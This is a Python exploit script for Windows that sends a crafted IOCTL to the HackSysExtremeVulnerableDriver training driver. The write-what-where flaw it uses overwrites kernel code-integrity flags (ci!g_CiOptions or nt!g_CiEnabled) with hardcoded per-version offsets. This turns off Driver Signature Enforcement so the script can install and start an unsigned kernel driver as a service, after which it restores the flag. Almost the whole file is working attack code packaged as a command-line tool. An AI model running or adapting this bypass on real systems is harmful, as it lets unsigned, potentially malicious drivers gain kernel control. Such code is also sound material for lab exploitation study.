from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, platform
import optparse

VER_NT_WORKSTATION 			= 1 # The system is a workstation.
VER_NT_DOMAIN_CONTROLLER	= 2	# The system is a domain controller.
VER_NT_SERVER				= 3	# The system is a server, but not a domain controller.

GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0

FILE_DEVICE_UNKNOWN = 0x00000022

METHOD_BUFFERED		= 0x0
METHOD_IN_DIRECT	= 0x1
METHOD_OUT_DIRECT	= 0x2
METHOD_NEITHER		= 0x3

FILE_READ_DATA		= 0x1
FILE_WRITE_DATA 	= 0x2
FILE_ANY_ACCESS		= 0x0

INVALID_HANDLE_VALUE = -1

FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
NULL = 0x0
NTSTATUS = DWORD

Psapi	= windll.Psapi
kernel32 = windll.kernel32
ntdll = windll.ntdll
ntdll.NtAllocateVirtualMemory.argtypes      = [HANDLE, LPVOID, ULONG, LPVOID,
                                                ULONG, DWORD]
ntdll.NtAllocateVirtualMemory.restype       = NTSTATUS
kernel32.WriteProcessMemory.argtypes        = [HANDLE, LPVOID, LPCSTR, DWORD, 
                                                POINTER(LPVOID)]
kernel32.WriteProcessMemory.restype         = BOOL                                                

Advapi32 = windll.Advapi32

OpenSCManager = windll.advapi32.OpenSCManagerA
OpenSCManager.argtypes = [
	c_char_p,	# lpMachineName
	c_char_p,	# lpDatabaseName
	c_uint ]	# dwDesiredAccess

CreateService = windll.advapi32.CreateServiceA
CreateService.argtypes = [
	c_uint,		# hSCManager
	c_char_p,	# lpServiceName
	c_char_p,	# lpDisplayName
	c_uint,		# dwDesiredAccess
	c_uint,		# dwServiceType
	c_uint,		# dwStartType
	c_uint,		# dwErrorControl
	c_char_p,	# lpBinaryPathName
	c_char_p,	# lpLoadOrderGroup
	c_void_p,	# lpdwTagId
	c_char_p,	# lpDependencies
	c_char_p,	# lpServiceStartName
	c_char_p ]	# lpPassword

StartService = windll.advapi32.StartServiceA
StartService.argtypes = [
	c_uint,		# hService,
	c_uint,		# dwNumServiceArgs
	c_void_p ]	# lpServiceArgVectors
StartService.restype = c_uint

OpenService = windll.advapi32.OpenServiceA
OpenService.argtypes = [
	c_uint,		# hSCManager
	c_char_p,	# lpServiceName
	c_uint ]	# dwDesiredAccess
OpenService.restype = c_uint

CloseServiceHandle = windll.advapi32.CloseServiceHandle
CloseServiceHandle.argtypes = [ c_uint ] # hSCObject

SC_MANAGER_ALL_ACCESS = 0xF003F
SERVICE_KERNEL_DRIVER = 0x00000001
SERVICE_DEMAND_START = 0x00000003
SERVICE_ERROR_NORMAL = 0x00000001
SERVICE_ALL_ACCESS = 0xF01FF

def disable_pma():
	print "[*] Disabling Program Compatibility Assistant Service"
	os.system('net stop "Program Compatibility Assistant Service"')

def install_service(service_name, file_path):
	print "[*] Opening SC Manager"
	h_scmanager = OpenSCManager(None,None,SC_MANAGER_ALL_ACCESS)
	if h_scmanager is not None:
		print "[+] Opened SC Manager"
		print "[*] Creating service"
		h_service = CreateService(h_scmanager,
											   service_name,
											   service_name,
											   SERVICE_ALL_ACCESS,
											   SERVICE_KERNEL_DRIVER,
											   SERVICE_DEMAND_START,
											   SERVICE_ERROR_NORMAL,
											   file_path,
											   None,
											   0,
											   None,
											   None,
											   None)
		if h_service != 0:
			print "[+] Created service"
			CloseServiceHandle(h_service)
			CloseServiceHandle(h_scmanager)
			return 1
		else:
			print "[-] Creating service failed"
			return None
		CloseServiceHandle(h_scmanager)
		return None
	print "[-] Failed to open SC Manager"
	return None

def remove_service(service_name):
	print "[*] Opening SC Manager"
	h_scmanager = OpenSCManager(None,None,SC_MANAGER_ALL_ACCESS)
	if h_scmanager is not None:
		print "[+] Opened SC Manager"
		print "[*] Opening service"
		h_service = OpenService(h_scmanager,service_name,SERVICE_ALL_ACCESS)
		if h_service is not None:
			print "[+] Service opened"
			print "[*] Deleting service"
			status = DeleteService(h_service)
			if status != 0:
				print "[+] Service deleted"
			else:
				print "[-] Failed to delete service"

			CloseServiceHandle(h_service)
			CloseServiceHandle(h_scmanager)
			return
		else:
			print "[-] Failed to open service"
		CloseServiceHandle(h_scmanager)
		return
	print "[-] Failed to open SC Manager"

def start_service(service_name):
	print "[*] Opening SC Manager"
	h_scmanager = OpenSCManager(None,None,SC_MANAGER_ALL_ACCESS)
	if h_scmanager is not None:
		print "[+] Opened SC Manager"
		print "[*] Opening service"
		h_service = OpenService(h_scmanager,service_name,SERVICE_ALL_ACCESS)

		if h_service is not None:
			print "[+] Service opened"
			print "[*] Starting service"
			status = StartService(h_service,0,None)
			if status != 0:
				print "[+] Service started"
				return 1
			else:
				print "[-] Failed to start service or it's already running"
				return None
	return None
				
def ctl_code(function,
			 devicetype = FILE_DEVICE_UNKNOWN,
			 access = FILE_ANY_ACCESS,
			 method = METHOD_NEITHER):
	"""Recreate CTL_CODE macro to generate driver IOCTL"""
	return ((devicetype << 16) | (access << 14) | (function << 2) | method)

def getLastError():
	"""Format GetLastError"""
	buf = create_string_buffer(2048)
	if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
			kernel32.GetLastError(), NULL,
			buf, sizeof(buf), NULL):
		print "[-] " +  buf.value
	else:
		print "[-] Unknown Error"
		
def alloc_memory(base_address, input, input_size):
	"""
	Allocate input buffer
	"""
	print "[*] Allocating input buffer"
	input_size_c = c_int(input_size)
	# Allocate the memory
	base_address_c = LPVOID(base_address)
	zerobits	  = ULONG(0)
	input_size_c	= LPVOID(input_size)
	written	   = LPVOID(0)				   
	dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff,
											 byref(base_address_c),
											 zerobits,
											 byref(input_size_c),
											 MEM_RESERVE|MEM_COMMIT,
											 PAGE_EXECUTE_READWRITE)

	if dwStatus != STATUS_SUCCESS:
		print "[-] Error while allocating memory: %s" % hex(dwStatus)
		getLastError()
		sys.exit()

	alloc = kernel32.WriteProcessMemory(0xFFFFFFFFFFFFFFFF, base_address_c, input, len(input), written)
	if alloc == 0:
		print "[-] Error while writing our input buffer memory: %s" % alloc
		getLastError()
		sys.exit()

def find_driver_base(driver=None):
	#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
	if platform.architecture()[0] == '64bit':
		lpImageBase = (c_ulonglong * 1024)()
		lpcbNeeded = c_longlong()
		Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
	else:
		lpImageBase = (c_ulong * 1024)()
		lpcbNeeded = c_long()
	driver_name_size = c_long()
	driver_name_size.value = 48
	Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
	for base_addr in lpImageBase:
		driver_name = c_char_p('\x00' * driver_name_size.value)
		if base_addr:
			Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
			if driver == None and driver_name.value.lower().find("krnl") != -1:
				print "[+] Retrieving kernel info..."
				print "[+] Kernel version:", driver_name.value
				print "[+] Kernel base address: %s" % hex(base_addr)
				return (base_addr, driver_name.value)
			elif driver_name.value.lower() == driver:
				print "[+] Retrieving %s info..." % driver_name
				print "[+] %s base address: %s" % (driver_name, hex(base_addr))
				return (base_addr, driver_name.value)
	return None	

def get_ci_values():
	version = sys.getwindowsversion()
	if((version.major == 6) and (version.minor == 1)):
		# the target machine's OS is Windows 7 / SP1
		print "[*] OS version: Windows 7 / SP1"
		g_cioptions_offset = 0x5e30
		g_cienabled_offset = 0x226eb8
		g_cioptions_default = 0x00000006
		g_cioptions_set = 0x00000000
		g_cienabled_default = 0x00000001
		g_cienabled_set = 0x00000000
		disable_pma() #to avoid error message about unsigned driver
	elif '8.1' == platform.win32_ver()[0]:
		# the target machine's OS is Windows 8.1
		print "[*] OS version: Windows 8.1"
		g_cioptions_offset = 0x15360
		g_cienabled_offset = None
		g_cioptions_default = 0x00000006
		g_cioptions_set = 0x00000000
		g_cienabled_default = None
		g_cienabled_set = None
	elif '10' == platform.win32_ver()[0]:
		# the target machine's OS is Windows 10
		print "[*] OS version: Windows 10"
		g_cioptions_offset = 0x1dcb0
		g_cienabled_offset	= None
		g_cioptions_default = 0x00000006
		g_cioptions_set = 0x00000000
		g_cienabled_default = None
		g_cienabled_set = None
	else:
		print "[-] No matching OS found, exiting..."
		sys.exit(-1)
	return (g_cioptions_offset, g_cienabled_offset, g_cioptions_default, g_cioptions_set, g_cienabled_default, g_cienabled_set)

if __name__ == '__main__':
	
	usage = "Usage: %prog [options]"
	parser = optparse.OptionParser(usage=usage)
	# Uncomment the first line to accept a usermane as a parameter. If Local Auth in Netwitness is used.
	parser.add_option('-o', '--g_cioptions', action='store_true', dest='g_cioptions', default=True, help='Use CI!g_cioptions flag to bypass DSE')
	parser.add_option('-e', '--g_cienabled', action='store_true', dest='g_cienabled', default=False, help='Use nt!g_cienabled flag to bypass DSE')

	parser.add_option('-s', '--service', action='store', dest='service_name', default='', help='Service name to install')
	parser.add_option('-p', '--path', action='store', dest='file_path', default='', help='Path of the unsigned driver')
	options, args = parser.parse_args()

	if (options.service_name == '' or options.file_path == ''):
		print "[-] You need to specify service name and path to the driver, exiting..."
		sys.exit(-1)

	(g_cioptions_offset, g_cienabled_offset, g_cioptions_default, g_cioptions_set, g_cienabled_default, g_cienabled_set) = get_ci_values()

	if (options.g_cienabled and not g_cienabled_offset):
		print "[-] nt!g_cienabled offset is not available in this OS, exiting..."
		sys.exit(-1)
	
	if options.g_cienabled:
		(kernelbase, dllname) = find_driver_base()
		print "[*] kernel base: " + hex(kernelbase)
		g_cienabled_address = kernelbase+g_cienabled_offset
		print "[*] nt!g_cienabled: " + hex(g_cienabled_address)
		set = g_cienabled_set
		default = g_cienabled_default
		address = g_cienabled_address
	elif options.g_cioptions:
		(cibase, dllname) = find_driver_base("ci.dll")
		print "[*] CI.dll base: " + hex(cibase)
		g_cioptions_address = cibase+g_cioptions_offset
		print "[*] ci!g_cioptions: " + hex(g_cioptions_address)
		set = g_cioptions_set
		default = g_cioptions_default
		address = g_cioptions_address
		print "[*] disable DSE with the value: " + hex(set)
		print "[*] enable DSE with the value: " + hex(default)
	else:
		print "[-] No option specified, exiting..."
		sys.exit(-1)
	
	#allocate input memory to disable DSE
	size = 0x1000
	input = "\x10\x00\x41\x41\x00\x00\x00\x00"
	input += struct.pack("Q",address)
	input += struct.pack("<L",set) #clear DSE
	input += "\x42" * (size - len(input))
	alloc_memory(0x0000000041410000, input, size)

	#allocate input memory to enable DSE
	size = 0x1000
	input = "\x10\x00\x42\x42\x00\x00\x00\x00"
	input += struct.pack("Q",address)
	input += struct.pack("<L",default) #reset DSE
	input += "\x43" * (size - len(input))
	alloc_memory(0x0000000042420000, input, size)

	IOCTL_VULN	= 0x0022200b # 
	DEVICE_NAME   = "\\\\.\\HackSysExtremeVulnerableDriver"
	dwReturn	  = c_ulong()
	inputbuffer	   = 0x41410000 #memory address of the input buffer
	inputbuffer_size  = 0x1000
	IoStatusBlock = c_ulong()

	print "[*] Turning off DSE"
	driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
	if (INVALID_HANDLE_VALUE == driver_handle):
		print "[-] Couldn't open driver, exiting..."
		sys.exit(-1)
	else:
		print "[*] Talking to the driver sending vulnerable IOCTL..."
		dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
									   None,
									   None,
									   None,
									   byref(IoStatusBlock),
									   IOCTL_VULN,
									   inputbuffer,
									   inputbuffer_size,
									   None,
									   0x0
									   )

	print "[*] Installing unsigned service..."
	r = install_service(options.service_name,options.file_path)
	if not r:
		print "[-] Failed to install service, exiting..."
		sys.exit(-1)

	#start driver
	print "[*] Starting unsigned service"
	start_service(options.service_name)
	print "[*] Restoring DSE"
	inputbuffer	   = 0x42420000 #memory address of the input buffer
	inputbuffer_size  = 0x1000
	IoStatusBlock2 = c_ulong()
	driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
	if (INVALID_HANDLE_VALUE == driver_handle):
		print "[-] Couldn't open driver, exiting..."
		sys.exit(-1)
	else:
		print "[*] Talking to the driver sending vulnerable IOCTL..."
		dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
									   None,
									   None,
									   None,
									   byref(IoStatusBlock2),
									   IOCTL_VULN,
									   inputbuffer,
									   inputbuffer_size,
									   None,
									   0x0
									   )
